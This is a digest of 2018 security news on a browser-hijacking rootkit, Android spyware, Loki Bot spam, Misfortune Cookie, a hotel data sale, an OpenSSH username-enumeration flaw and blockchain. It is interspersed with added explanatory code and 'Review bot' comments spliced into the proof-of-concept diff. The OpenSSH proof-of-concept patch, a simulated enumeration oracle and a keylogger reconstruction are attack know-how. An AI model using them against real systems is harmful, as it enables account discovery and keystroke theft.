FBI and Justice Department officials have said publicly that there was no evidence Clinton's server was hacked by a foreign power. Former FBI Director James Comey said at a July 2016 news conference that the FBI did not find direct evidence that the server had been successfully hacked, though he also acknowledged that, "given the nature of the system and of the actors potentially involved," it would have been unlikely for the bureau to find such direct evidence.

A June report from the Justice Department's inspector general on the FBI's handling of the Clinton investigation said FBI specialists did not find evidence that the server had been hacked, with one forensics agent saying he felt "fairly confident that there wasn't an intrusion."

An FBI official said Wednesday after the Daily Caller story and Trump tweet that the "FBI has not found any evidence the servers were compromised."

The White House did not immediately comment on the FBI's statement.

CEIDPageLock Rootkit Hijacks Web Browsers
30.8.2018 securityweek

A new rootkit that has been distributed via the RIG exploit kit over the past few weeks can manipulate web browsers and also contains sophisticated defense mechanisms, Check Point says.

Dubbed CEIDPageLock, the malware was first spotted a few months ago when it attempted to modify the homepage of a victim’s browser. It currently replaces the victim browser’s homepage with a site posing as a Chinese web directory.

In addition, the latest versions of the malware monitor user browsing and, when the user attempts to access certain popular Chinese websites, dynamically replace the content of those sites with the fake home page.

“Browser hijacking employed by malware like CEIDPageLock, can be profitable due to revenue earned via redirecting victims to search engines that share ad revenue with the referrers,” Check Point explained.

The malware’s operators also use a series of hijacking tricks to gather data on the victims’ browsing habits, such as monitoring visited sites, which could be used for their own ad campaigns or sold to other companies.

A dropper is used during infection to extract a digitally signed 32-bit kernel-mode driver. The certificate was issued by Thawte but has since been revoked. After registering and starting the driver, the dropper sends out the infected machine’s MAC address and a user ID.

The driver is launched at startup and remains fairly stealthy, evading antivirus solutions. It connects to one of two command and control (C&C) domains hardcoded in it and downloads a homepage configuration that it uses to tamper with the browser.

The newer version of the malware is also packed with VMProtect, thus making analysis and unpacking difficult, especially since it is also a kernel mode driver, Check Point notes.

This iteration also includes a “redirection” capability that sends victims to the fake homepage whenever they try to reach targeted sites. The rootkit inspects every outgoing HTTP message for specific strings and, when one is found, adds the originating process to its redirection list.

The malware also blocks browsers from accessing the files of a series of anti-virus products and can create a registry key belonging to a security product.

The vast majority of CEIDPageLock’s targets are located in China, with only a negligible number of infections outside the country, Check Point says.

“At first glance, writing a rootkit that functions as a browser hijacker and employing sophisticated protections such as VMProtect, might seem like overkill. However, it seems that this simple malicious technique can be very profitable and thus the attackers believe that it is worthwhile to invest in building a stealthy and persistent tool for it,” the security firm notes.

Furthermore, the malware has the ability to execute code on an infected device. Coupled with the fact that it operates from the kernel and its persistence mechanism, CEIDPageLock is “a potentially perfect backdoor,” Check Point concludes.

China Probes Suspected Customer Data Leak at Accor Partner
30.8.2018 securityweek Incident

Shanghai police said they were investigating a suspected data leak at NASDAQ-listed Chinese hotelier Huazhu Group, the local partner of France-based AccorHotels.

Huazhu, one of China’s biggest hoteliers, released a statement on Tuesday saying it had alerted police to reports that the company's internal data was being sold online, asking them to investigate.

Chinese media reports said the data included guest membership information, personal IDs, check-in records, guest names, mobile numbers, and emails.

Police in Shanghai said in a statement that they were looking into the case.

Huazhu's website said it operates more than 3,000 hotels in more than 370 cities in China, including the AccorHotels brands Ibis and Mercure.

Shanghai-based Huazhu formed a long-term alliance with Accor in 2014 to help the French hotel group develop the Chinese market.

Huazhu said the release of the data had caused a "vicious impact", without giving specifics, and that it was conducting an internal investigation.

The sale of personal information is common in China, which last year implemented a controversial cybersecurity law that requires services to store user data in China and receive approval from users before sharing their details.

Chinese e-commerce giant Alibaba came under fire earlier this year over its handling of user data in an episode that underscores growing concerns for privacy in the hyper-digitised country.

Alibaba's online-payments affiliate Ant Financial was forced to apologise after users said they felt misled into allowing its Alipay service to share data on their spending habits with Ant's credit-scoring arm and other third-party services.

Advanced Android Spyware Remained Hidden for Two Years
30.8.2018 securityweek Android

A newly detailed Android spyware that has an incredibly wide-ranging protocol has been active since May 2016, Kaspersky Lab warns.

Dubbed BusyGasper, the malware includes device sensor listeners (such as motion detectors), can exfiltrate data from messaging applications (WhatsApp, Viber, Facebook), has keylogging capabilities, and supports 100 commands.

Featuring a multicomponent architecture, the malware can download payloads and updates from the command and control (C&C) server, an FTP server belonging to the free Russian web hosting service Ucoz.

The spyware also supports the IRC protocol and can “log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments,” Kaspersky’s security researchers reveal.

The malware appears to be installed manually, likely through physical access to the device, which would explain why fewer than 10 victims have been identified to date, all of them located in Russia.

The attackers collected victims’ personal data, including messages from IM applications, and SMS banking messages, yet the actor doesn’t appear interested in stealing the victims’ money.

“We found no similarities to commercial spyware products or to other known spyware variants, which suggests BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware,” Kaspersky says.

An initial module installed on the targeted device can be controlled over the IRC protocol and allows operators to deploy additional components. The module apparently has root privileges, yet the researchers found no evidence of an exploit being used to obtain such rights.

The first module can start/stop IRC, manipulate IRC settings, exit, use root features, report when the screen is on, hide/unhide the implant icon, execute shell commands, send commands to the second module, download and copy a component to the system path, and write a specified message to the log.

The second module writes a log of the command execution history to a file named “lock,” which can be exfiltrated to the C&C server. Log messages can also be sent via SMS to the attacker’s number.

“The malware has its own command syntax that represents a combination of characters while the “#” symbol is a delimiter,” Kaspersky explains.

Featuring all of the capabilities found in modern spyware, the threat can spy on all available device sensors and can log registered events, can enable GPS/network tracking, and can execute multiple initial commands if an incoming SMS contains a specific string.

BusyGasper’s keylogging is implemented in an original way, Kaspersky says. The malware creates a TextView element hidden from the user and attaches an OnTouchListener to it to process every tap. The listener handles only coordinates, which it matches against hardcoded ones.
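How a coordinate-matching keylogger turns touches back into text is easier to see in code. The following is an added example, not BusyGasper’s code: it models the hardcoded key map as a list of rectangles, resolves each (x, y) touch to the key whose box contains it, and replays a constructed tap sequence. The screen and keyboard geometry are invented for the example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class KeyRect:
    """One on-screen key: its label and pixel bounding box [left, right) x [top, bottom)."""
    label: str
    left: int
    top: int
    right: int
    bottom: int

    def contains(self, x: int, y: int) -> bool:
        return self.left <= x < self.right and self.top <= y < self.bottom


def build_layout(width: int, top: int, row_height: int, rows: List[str]) -> List[KeyRect]:
    """Build the hardcoded key map for a row-based keyboard.  The geometry is invented
    for this example; a real implant carries the numbers for the one keyboard and
    screen size it was written against."""
    keys = []
    for r, row in enumerate(rows):
        key_w = width // len(row)
        y0 = top + r * row_height
        for c, ch in enumerate(row):
            keys.append(KeyRect(ch, c * key_w, y0, (c + 1) * key_w, y0 + row_height))
    return keys


def resolve_tap(layout: List[KeyRect], x: int, y: int) -> Optional[str]:
    """Map one touch event to a key label, or None if it hit no known key."""
    for key in layout:
        if key.contains(x, y):
            return key.label
    return None


def reconstruct_text(layout: List[KeyRect], taps: List[Tuple[int, int]]) -> str:
    """Replay a sequence of (x, y) touches through the key map; unknown taps become '?'."""
    return "".join(resolve_tap(layout, x, y) or "?" for x, y in taps)


def key_center(layout: List[KeyRect], label: str) -> Tuple[int, int]:
    """Centre of a key; used only to build the constructed tap sequence below."""
    key = next(k for k in layout if k.label == label)
    return (key.left + key.right) // 2, (key.top + key.bottom) // 2


# Constructed example: 1080-px-wide portrait screen, three-row keyboard starting at y=1400.
LAYOUT = build_layout(1080, 1400, 150, ["qwertyuiop", "asdfghjkl", "zxcvbnm"])

# Constructed touch stream: the user types "pass", with one stray tap on a field
# above the keyboard (500, 300) that matches no hardcoded key.
SAMPLE_TAPS = [key_center(LAYOUT, "p"), key_center(LAYOUT, "a"), (500, 300),
               key_center(LAYOUT, "s"), key_center(LAYOUT, "s")]


def demo() -> str:
    """Reconstruct the constructed tap stream; returns 'pa?ss'."""
    return reconstruct_text(LAYOUT, SAMPLE_TAPS)


if __name__ == "__main__":
    print(demo())
```

The approach needs no accessibility service or input-method hooking, only a view that receives touches, which is what makes it quiet. Its weakness is the same thing: the coordinates are hardcoded, so a different keyboard app, screen size, orientation or layout (numbers, symbols, a language switch) yields garbage, as the stray tap at (500, 300) resolving to '?' shows.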

A hidden menu that provides control of implant features appears to have been created for manual operator control. The menu is activated if the operator calls the hardcoded number “9909” from the infected device.

A full list of commands supported by the malware shows that it can capture photos, record audio and video, execute specified shell commands, monitor and exfiltrate messages, update itself, and perform various backdoor commands.

Loki Bot Attacks Target Corporate Mailboxes
30.8.2018 securityweek BotNet

Loki Bot’s operators have been targeting corporate mailboxes with their spam messages, Kaspersky Lab reports.

The emails employ various lures to trick potential victims into opening malicious attachments that would deploy the Loki Bot stealer onto the target machines. The messages masquerade as notifications from other companies, or as orders and offers.

As part of the campaign, cybercriminals have been targeting corporate mailboxes that can be obtained from public sources or which are listed on the targeted companies’ websites, Kaspersky discovered.

The spam messages attempt to deliver the malicious payload via an attached ISO file. The extension belongs to images of optical discs, which can be mounted to access their content; modern operating systems mount ISO files directly, and dedicated software that handles the format also exists.

ISO files are complete images of optical discs, and cybercriminals are now abusing them as containers for delivering malicious applications, although such cases are still rare, Kaspersky says.
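What a mail gateway needs at this point is a check that looks at attachment content rather than the file name. The following is an added example, not Kaspersky’s code or anything from the campaign: it walks a MIME message with Python’s standard email package and flags any attachment whose bytes at the ISO 9660 Primary Volume Descriptor position (sector 16, identifier "CD001") mark it as a disc image, whatever extension it carries. The message and the 32 KB dummy image are constructed inline for the demonstration.

```python
import email
from email import policy
from email.message import EmailMessage

# ISO 9660 layout: the Primary Volume Descriptor occupies sector 16 (2048-byte
# sectors).  Byte 0 of the descriptor is its type (1 = primary) and bytes 1..5
# hold the standard identifier "CD001".
SECTOR = 2048
ISO_ID_OFFSET = 16 * SECTOR + 1
ISO_ID = b"CD001"


def is_iso9660(data: bytes) -> bool:
    """True if the payload carries an ISO 9660 volume descriptor, whatever its name says."""
    return data[ISO_ID_OFFSET:ISO_ID_OFFSET + len(ISO_ID)] == ISO_ID


def suspicious_attachments(raw_message: bytes) -> list:
    """Return (filename, reason) pairs for attachments that are disc images by content,
    or that merely claim to be one (.iso name without the descriptor)."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        payload = part.get_payload(decode=True) or b""
        by_content = is_iso9660(payload)
        by_name = name.lower().endswith(".iso")
        if by_content and not by_name:
            findings.append((name, "ISO 9660 image behind a non-.iso name"))
        elif by_content:
            findings.append((name, "ISO 9660 image"))
        elif by_name:
            findings.append((name, ".iso name but no ISO 9660 descriptor"))
    return findings


def build_sample_message() -> bytes:
    """Constructed test message (not a real campaign sample): an 'order' carrying a
    dummy ISO image under two names plus a harmless PDF."""
    dummy_iso = b"\x00" * (16 * SECTOR) + b"\x01" + ISO_ID + b"\x01" + b"\x00" * 64
    msg = EmailMessage()
    msg["From"] = "orders@supplier.invalid"
    msg["To"] = "accounts@example.invalid"
    msg["Subject"] = "Purchase order 4471"
    msg.set_content("Please find the order attached.")
    msg.add_attachment(dummy_iso, maintype="application", subtype="octet-stream",
                       filename="PO-4471.iso")
    msg.add_attachment(dummy_iso, maintype="application", subtype="octet-stream",
                       filename="catalog.dat")
    msg.add_attachment(b"%PDF-1.4\n%%EOF\n", maintype="application", subtype="pdf",
                       filename="invoice.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reason in suspicious_attachments(build_sample_message()):
        print(f"{name}: {reason}")
```

A gateway that matches only on the `.iso` extension misses the `catalog.dat` case; one that matches only on content still wants the by-name branch, because an `.iso` that is not an image is at least worth a look. The same content-first rule applies to the other container formats a filter is expected to catch.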

As part of the recent campaign, the ISO files contained the Loki Bot malware, an information-stealing Trojan designed to harvest usernames and passwords from the victim machines, along with other user data.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners,” Kaspersky notes.

The campaign shows yet again that the security measures organizations take should include employee training alongside technical protection; employees’ actions can cause irreparable damage to a business, the security firm notes.

“Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc,” Kaspersky concludes.

4-year old Misfortune Cookie vulnerability threatens Capsule Technologies medical gateway device
30.8.2018 securityaffairs Incident

The Misfortune Cookie flaw is threatening medical equipment that connects bedside devices to the hospital’s network infrastructure.
In December 2014, researchers at Check Point Software Technologies disclosed the Misfortune Cookie vulnerability, a flaw in an embedded web server called RomPager that affected millions of devices. An attacker could exploit it to take over home routers from a range of manufacturers and run man-in-the-middle attacks on the traffic passing through them.

An attacker that is able to compromise a vulnerable device like a home router could use it as an entry point in a target network and hack other devices.

Four years later, the Misfortune Cookie vulnerability is still threatening devices worldwide, in particular, medical equipment that connects bedside devices to the hospital’s network infrastructure.

Researchers from security firm CyberMDX discovered that flawed versions of RomPager (4.01 through 4.34) run on different variants of the Capsule Datacaptor Terminal Server (DTS), a gateway included in medical device information systems.

The gateway device connects bedside equipment (anesthesia and infusion pumps, respirators and IoT products) to the network.

“CyberMDX discovered a previously undocumented vulnerability in the device, noting that Qualcomm Life’s Capsule Datacaptor Terminal Server (a medical device gateway) is exposed to the “misfortune cookie” CVE-2014-9222. This opens the possibility for remote arbitrary memory write, which can lead to unauthorized login and code execution.” reads the security advisory published by the company.

Experts warn that modifying the configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device. The attacker can exploit the flaw to steal the patient’s sensitive information.

“Altering the availability and/or configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device and allows spoofing communication to and/or from the medical device. In other words — when patient’s sensitive information is sent from a medical device it can be leaked and spoofed by an attacker in this situation.” continues the report.

The bad news is that an exploit code for this flaw is available online.


The US ICS-CERT issued an alert for the vulnerability; the flaw, tracked as CVE-2014-9222, received a severity score of 9.8 out of 10.

“This vulnerability allows an attacker to send a specially crafted HTTP cookie to the web management portal to write arbitrary data to the device memory, which may allow remote code execution,” states the ICS-CERT.

Qualcomm Life Capsule Technologies has released a security patch to address the vulnerability, but it applies only to the Single Board variant of the DTS (from 2009); it cannot be applied to the Dual Board, the Capsule Digi Connect ES, or a Capsule Digi Connect ES converted to a DTS.

Administrators of products that cannot be updated should disable the embedded web server as a mitigation: it is only used for configuration during initial deployment and is not needed for remote support of the device.

NCCIC recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. The recommendations in the ICS-CERT alert are:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Data of 130 Million hotel chain guests offered for 8 BTC on Dark Web
30.8.2018 securityaffairs Incident

A hacker is offering for sale the personal details of over 130 million hotel chain guests on a Chinese Dark Web forum.
The news was reported by Bleeping Computer: a hacker is selling the personal details of over 130 million hotel guests for 8 Bitcoin on a Chinese Dark Web forum.

“The breach was reported today by Chinese media after several cyber-security firms spotted the forum ad [1, 2, 3, 4].” states Bleeping Computer.

The price for the huge trove of data is 8 Bitcoin (roughly $49,000). It includes official website registration information (ID card number, mobile phone number, email address, login password); check-in registration information (customer name, ID card number, home address, birthday); and booking information (name, card number, mobile phone number, check-in time, departure time, hotel ID number, room number).

The offer was noticed by several cyber-security firms. The hacker claims to have obtained the data from Huazhu Hotels Group Ltd, one of the biggest Chinese hotel chains, which operates 13 hotel brands across 5,162 hotels in 1,119 Chinese cities.

The stolen data appears to be related to guests who stayed at any of Huazhu’s hotel brands (Hanting Hotel, Grand Mercure, Joye, Manxin, Novotel, Mercure, CitiGo, Orange, All Season, Starway, Ibis, Elan, Haiyou).

The ad published by the seller states the stolen data is included in an archive of 141.5 GB that contains 240 million records, with information on roughly 130 million hotel guests that stayed at one of Huazhu hotels.


On August 28th, the China Lodging Group issued a statement on the Weibo platform announcing that the group has launched an internal investigation, the Chinese hotel chain also reported the incident to the authorities.

According to Chinese cyber-security firm Zibao, the data are authentic and the incident likely occurred in early August.

Zibao experts believe the data come from a new leak rather than a compilation of previous breaches, and that they can be traced to a mistake by a Huazhu programmer who uploaded them to GitHub.

“Zibao Technology believes that this batch of data is suspected to be leaked by a Chinese-speaking company programmer who uploaded to GitHub 20 days ago using a database connection.” reads

CVE-2018-15919 username enumeration flaw affects OpenSSH Versions Since 2011
30.8.2018 securityaffairs

Qualys experts discovered that OpenSSH is still vulnerable to a username-enumeration oracle: the CVE-2018-15919 flaw has been present at least since September 2011.
Security experts from Qualys discovered that OpenSSH is still vulnerable to a username-enumeration attack. The flaw, tracked as CVE-2018-15919, has been present at least since September 2011.

A few days earlier, security researcher Darek Tytko reported a similar username-enumeration vulnerability in the OpenSSH server. That flaw, tracked as CVE-2018-15473, affects all versions of the software released since 1999 and can be exploited by a remote attacker to determine which usernames are registered on an OpenSSH server.

Researchers from Qualys discovered that another username-enumeration vulnerability, tracked as CVE-2018-15919, affects OpenSSH up to and including the latest version.

Qualys researchers discovered the vulnerability while analyzing a commit in the OpenBSD source code.

“While properly reviewing the now-famous OpenSSH commit we discovered another username-enumeration vulnerability in auth2-gss.c (enabled by default on at least Fedora, CentOS, and Red Hat Enterprise Linux).” reads the security advisory.

“This vulnerability affects OpenSSH versions from 5.9 (September 6, 2011) to the recently released 7.8 (August 24, 2018), inclusive. It is quite similar to CVE-2018-15473 (it is not a timing attack), but it is also markedly different (code excerpts from OpenSSH 7.8p1)”

The issue resides in the auth2-gss.c module that is enabled by default on many Linux distros, including CentOS, Fedora, and Red Hat Enterprise Linux.

The server’s reply is the same packet whether or not the user exists, but its failure counting differs, as the advisory explains:

“if the user is valid, then “server_caused_failure” is set, “failures” is not incremented, and the attacker can attempt the GSSAPI authentication indefinitely;
if the user is invalid, then “server_caused_failure” is not set, “failures” is incremented (at line 412), and the server will disconnect the attacker (at line 417) after max_authtries authentication attempts (6, by default).”
In other words, ‘server_caused_failure’ is set only when the user exists; for a nonexistent user it is not, and that difference in bookkeeping is what the attacker measures.

Experts explained that the number of attempts for an invalid user is limited to six, while if a valid user is provided the attacker can attempt the GSSAPI authentication indefinitely.

That difference is the oracle: by sending more than max_authtries GSSAPI requests for a candidate username and watching whether the server drops the connection, an attacker learns whether the account exists. The unlimited GSSAPI attempts themselves do not let the attacker guess a password, but a confirmed list of usernames is exactly what a later password-guessing attack needs.
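The two branches the advisory describes make an oracle, and the following added example (not OpenSSH code and not Qualys’s proof of concept) models both sides of it in Python: a per-connection server that mirrors sshd’s failure bookkeeping for a rejected gssapi-with-mic request, and a client that sends more than max_authtries such requests and watches whether the session survives. The `count_all_failures=True` server is an illustrative hardening that counts every rejected request; it is not what the OpenSSH maintainers shipped. The user list and mechanism names are constructed.

```python
from typing import Callable, Iterable, List, Set

MAX_AUTHTRIES = 6  # sshd default for MaxAuthTries


class GssapiAuthServer:
    """Per-connection model of sshd's gssapi-with-mic handling, reduced to the
    failure bookkeeping CVE-2018-15919 is about.  count_all_failures=False
    reproduces the behaviour the advisory describes; True is an illustrative
    hardening (every rejected request counts), not OpenSSH's own code."""

    def __init__(self, valid_users: Iterable[str], server_mechs: Iterable[str],
                 count_all_failures: bool):
        self.valid_users: Set[str] = set(valid_users)
        self.server_mechs: Set[str] = set(server_mechs)
        self.count_all_failures = count_all_failures
        self.failures = 0
        self.disconnected = False

    def userauth_gssapi(self, user: str, mech: str) -> str:
        """Handle one USERAUTH_REQUEST offering mechanism `mech` for `user`.
        Returns 'continue' (a token exchange would follow), 'failure' (USERAUTH_FAILURE,
        session kept open) or 'disconnect' (too many authentication failures)."""
        if self.disconnected:
            return "disconnect"
        if user in self.valid_users and mech in self.server_mechs:
            return "continue"   # a real server would now exchange GSSAPI tokens

        # Vulnerable logic: a valid user whose mechanism is rejected sets
        # server_caused_failure, so the attempt is not added to `failures`.
        # An invalid user is bailed out earlier and is counted.
        server_caused_failure = (user in self.valid_users) and not self.count_all_failures
        if not server_caused_failure:
            self.failures += 1
            if self.failures >= MAX_AUTHTRIES:
                self.disconnected = True
                return "disconnect"
        return "failure"


def user_exists(connect: Callable[[], GssapiAuthServer], user: str) -> bool:
    """The oracle: offer a mechanism the server does not support, more times than
    max_authtries, and see whether the session survives."""
    conn = connect()
    for _ in range(MAX_AUTHTRIES + 1):
        if conn.userauth_gssapi(user, "unsupported-mech") == "disconnect":
            return False
    return True


def enumerate_users(connect: Callable[[], GssapiAuthServer],
                    candidates: Iterable[str]) -> List[str]:
    """Run the oracle over a wordlist; each candidate gets a fresh connection."""
    return sorted(u for u in candidates if user_exists(connect, u))


# Constructed target: two real accounts, Kerberos as the only accepted mechanism.
def vulnerable_server() -> GssapiAuthServer:
    return GssapiAuthServer({"root", "deploy"}, {"krb5"}, count_all_failures=False)


def hardened_server() -> GssapiAuthServer:
    return GssapiAuthServer({"root", "deploy"}, {"krb5"}, count_all_failures=True)


if __name__ == "__main__":
    wordlist = ["root", "deploy", "alice", "nobody"]
    print("vulnerable:", enumerate_users(vulnerable_server, wordlist))  # ['deploy', 'root']
    print("hardened:  ", enumerate_users(hardened_server, wordlist))    # []
```

Against the vulnerable model the real accounts keep answering USERAUTH_FAILURE past the sixth request while the others are disconnected, so the wordlist is cleanly split; against the hardened model every candidate is disconnected and the oracle learns nothing. Counting every rejected GSSAPI offer would also cut off a legitimate client that offered more than six unsupported mechanisms, which real clients do not do.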

Experts published the following proof-of-concept code for the CVE-2018-15919 flaw:

diff -pruN openssh-7.8p1/gss-genr.c openssh-7.8p1-poc/gss-genr.c
--- openssh-7.8p1/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
@@ -286,6 +286,7 @@ ssh_gssapi_check_mechanism(Gssctxt **ctx

ssh_gssapi_set_oid(*ctx, oid);
+ return 1;
major = ssh_gssapi_import_name(*ctx, host);
if (!GSS_ERROR(major)) {
major = ssh_gssapi_init_ctx(*ctx, 0, GSS_C_NO_BUFFER, &token,
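Review bot: the `return 1;` inserted directly after `ssh_gssapi_set_oid(*ctx, oid);` makes `ssh_gssapi_check_mechanism` report every mechanism as usable and leaves the `ssh_gssapi_import_name` and `ssh_gssapi_init_ctx` calls below it unreachable, so the patched client offers GSSAPI without holding any Kerberos credential. That is the intent of the proof of concept, but nothing in the hunk says so; add a comment such as `/* PoC: claim every mechanism works, skip context setup */`, expect an unreachable-code warning from the compiler, and keep this build out of any client used for real logins.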
diff -pruN openssh-7.8p1/sshconnect2.c openssh-7.8p1-poc/sshconnect2.c
--- openssh-7.8p1/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
@@ -701,6 +701,7 @@ userauth_gssapi(Authctxt *authctxt)
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_TOKEN, &input_gssapi_token);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERROR, &input_gssapi_error);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERRTOK, &input_gssapi_errtok);
+ return 1;

mech++; /* Move along to next candidate */
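Review bot: the `return 1;` placed ahead of `mech++; /* Move along to next candidate */` turns that increment into dead code, so each time the gssapi-with-mic method is retried the client re-offers the same mechanism instead of exhausting its candidates and giving up. Together with the first hunk that is what lets the proof of concept keep sending identical requests and watch whether the server disconnects after max_authtries; state that in a comment, and drop the now-unreachable `mech++` if this ever becomes more than a test patch.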

According to Qualys, the OpenSSH maintainers do not consider username enumeration a critical issue and have not scheduled a fix.

“Open-source developer Damien Miller working on OpenSSH says that system libraries do not treat this type of information disclosure as a threat because usernames are considered the non-secret part of user identity, useless to an attacker without the accompanying password.” states Bleeping Computer.

“Specific users on a system can often give away the exact operating system or distribution, as well as services that are running on the system, especially if they have default usernames for those services,” Jimmy Graham, Director of Product Management at Qualys, told BleepingComputer.

What the Blockchain Taught Us about IT Security
30.8.2018 securityaffairs IT

It is not just about security, but in utilizing Blockchain to secure your company and your information.
With how fast technology is improving and being included in everyday activities or jobs to make them fast and efficient, it is important to make sure you are secured, especially when on the internet. You can have your own internet security installed, but if you are planning on running a reliable business you will need a strong and trusted company to provide secure IT systems and support. But it is not just about security, but in utilizing Blockchains to secure your company and your information.


What Does IT Stand For?

IT stands for Information Technology and it is basically all the technological advances we have made as a society. At first, IT was slow to start and no one believed that it would go far. But with how much IT has helped and made things easier for people, it is not a wonder why it has become a need for social progress. IT helps the American economy create new products, find the full potential in their employees, participate in global events and company offers, and even manage their own companies.

Without the advances of IT, we as a society would not be the high-functioning one we are now. But the more we rely on IT, the more exposed private and sensitive information becomes to abuse. That is why it is vital to have protection on a company’s systems, and not just any protection: it has to be strong enough to protect the vital information. That is where blockchains come in.

What is a Blockchain?
Blockchains can be hard to understand, especially if you do not know many technological terms. Blockchains first appeared as the ledger behind an online currency, Bitcoin, the original blockchain. More recently, large companies have started to use blockchains as a type of database that stores, shares and maintains data across businesses. There are different types of blockchain a company can create and maintain, and it is up to the company to decide which ones work for it. The types of blockchain are:

Public Blockchains
Blockchain-Inspired Cryptocurrencies
Private Blockchains
Public blockchains are openly available to the public and anyone with a computer can go on, see the data, and update it without needing any special permissions.

Blockchain-Inspired cryptocurrencies record ledgers that anyone can access, but it does need some connection to a business or company.

Private blockchains are secure and personal and are only meant to be shared among a certain group of computers and are not available for the public to access.

Each type of blockchain has its own benefits and security levels, so it is up to the company to decide just how secure they want their information to be.

What Type of Blockchain Technologies are there?
There are five blockchain technologies to look out for if you are considering adding blockchain technology to your business or company:

Smart Contracts
Blockchains-as-a-Service
Energy Efficiency
Permissioned Blockchains
Tangle

Smart contracts do exactly what you direct them to, based on an input of coded instructions. They are reliable if you require certain business actions to be completed at certain times in a specific way.

Blockchains-as-a-Service offers everything a business needs to start a blockchain when it is unable to build one itself.

Energy efficiency efforts try to reduce the energy needed to create and maintain a blockchain; the costly part is proof-of-work mining, so these designs replace it with less energy-intensive consensus schemes.

Permissioned blockchains are used mainly by banks and governments to control who can make transactions and who can make changes.

Tangle is a distributed ledger that is not, strictly, a blockchain: it keeps the advantages blockchains have and tries to improve on their limitations.

It is a lot of information to take in, especially when first starting out on trying to use blockchains. But it can become relatively simple with the right help and understanding of how blockchains can be an ideal form of security on the web.

How are Blockchains Helping in Online Security?
Blockchains and cryptocurrencies are growing in use every year with each technological advance. As businesses rely more on technology and online services, they have to make sure that they are safe and that their information does not fall into the wrong hands. What a blockchain offers here is a tamper-evident, append-only record: once an entry is written and shared with the other participants, it cannot be altered after the fact without the change being detectable. That is an integrity guarantee, not an impregnable wall; a blockchain does nothing to keep the data confidential or to protect the keys and endpoints that write to it, so those still need ordinary controls.
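What a blockchain actually provides is shown more precisely by a few lines of code than by the wall metaphor. The following is an added example, not code from any blockchain project: a minimal append-only ledger in Python in which every block carries the SHA-256 hash of its predecessor, with a verify routine that reports the first block at which the chain no longer holds together. The transaction payloads are constructed.

```python
import hashlib
import json
from typing import Any, Dict, List, Optional, Tuple

Block = Dict[str, Any]


def block_hash(block: Block) -> str:
    """SHA-256 over the canonical JSON of every field except the block's own hash."""
    body = {k: v for k, v in block.items() if k != "hash"}
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()


class Ledger:
    """Minimal append-only hash chain: each block commits to its predecessor's hash."""

    def __init__(self) -> None:
        genesis: Block = {"index": 0, "prev_hash": "0" * 64, "data": "genesis"}
        genesis["hash"] = block_hash(genesis)
        self.chain: List[Block] = [genesis]

    def append(self, data: Any) -> Block:
        prev = self.chain[-1]
        block: Block = {"index": prev["index"] + 1, "prev_hash": prev["hash"], "data": data}
        block["hash"] = block_hash(block)
        self.chain.append(block)
        return block

    def verify(self) -> Tuple[bool, Optional[int]]:
        """(True, None) if every block hashes correctly and links to its predecessor,
        otherwise (False, index of the first block where the chain breaks)."""
        for i, block in enumerate(self.chain):
            if block["hash"] != block_hash(block):
                return False, i
            if i > 0 and block["prev_hash"] != self.chain[i - 1]["hash"]:
                return False, i
        return True, None


def tamper_demo() -> List[Tuple[bool, Optional[int]]]:
    """Constructed scenario: three blocks, then an attacker edits block 1's payload,
    first naively and then with block 1's hash recomputed."""
    ledger = Ledger()
    ledger.append({"account": "A", "amount": 10})
    ledger.append({"account": "B", "amount": 5})
    results = [ledger.verify()]                       # intact chain

    ledger.chain[1]["data"] = {"account": "A", "amount": 1000}
    results.append(ledger.verify())                   # block 1 no longer matches its hash

    ledger.chain[1]["hash"] = block_hash(ledger.chain[1])
    results.append(ledger.verify())                   # now block 2's prev_hash is stale
    return results


if __name__ == "__main__":
    for ok, where in tamper_demo():
        print("valid" if ok else f"broken at block {where}")
```

Editing a block invalidates its own hash; recomputing that hash only moves the break one block later, because the successor still commits to the old value. A forger therefore has to rewrite every block after the one changed, and what makes that expensive in practice is that other participants hold copies of the chain (or, in public networks, that each block cost proof-of-work). None of this hides the data: the ledger is integrity protection, and the keys used to sign entries still need protecting like any other credential.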

Is this a Worthwhile Job?
Companies should invest in learning how to use blockchains or to train others in the skill since it seems like blockchains will be in high demand within the next year or so. It is still a relatively new concept, so while it is still starting out companies will be looking for the best blockchain engineers. The great thing about learning the blockchain skill is how versatile it is. Almost every type of company could use and benefit from the security blockchains offer. It has the potential to change lives just like the internet originally did when it first came out.

Blockchains are still a new concept that not everyone has heard about or fully understand the potential that it has. It will take some time for companies to start using blockchains instead of their previous security systems, but the change is expected to happen in around a year. You can be assured that blockchains will soon become normality when it comes to online security. It is best to start researching on blockchains, what they can be used for, and what you can do to make the transition easier.

Air Canada data breach – 20,000 users of its mobile app affected
30.8.2018 securityaffairs Incident

